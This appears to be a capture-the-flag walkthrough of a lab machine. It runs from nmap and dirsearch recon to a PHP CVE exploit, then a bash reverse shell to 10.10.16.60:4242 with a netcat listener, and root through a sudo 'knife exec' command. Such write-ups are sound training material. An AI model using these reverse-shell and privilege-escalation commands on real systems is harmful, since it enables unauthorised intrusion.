Let’s start with recon using nmap
nmap -sV -sS -A 10.10.10.242
Great, 2 port are open. let’s check the http server.
nothing special huh. let’s take some directory fuzzing.
python3 dirsearch.py -u 10.10.10.242
200 6KB http://10.10.10.242:80/index.php
200 6KB http://10.10.10.242:80/index.php/login
a login page?
nope. That just rabbit hole (?). The page still rendering index.php
okay.. move to next step. Let’s check what technologies this website use. I use wallaplyzer here
Maybe there’s outdated tech? Let’s check if PHP have any CVE.
And fortunally, there was.
Download the exploit and execute it.
and i got user shell.
But because this shell isn’t too inteactive ( cant move to other directories ), so i gonna make reverse shell first.
nc -lvp 4242
echo "bash -i >& /dev/tcp/10.10.16.60/4242 0>&1" > /tmp/shell.sh
chmod +x /tmp/shell.sh
Okay, let’s see if we can doing privilege escalation. I use
sudo -l as usual.
As you can see, i can execute program calles knife with sudo. Let’s check this interesting program with executing it.
there’s a lot of sub-command that you can use. I check it one per one until i found something interesting.
After reading the documentation, i found something interesting about that subcommand.
Let’s see if we can execute ruby command to gain root shell.
sudo /usr/bin/knife exec -E "exec('/bin/bash -i')"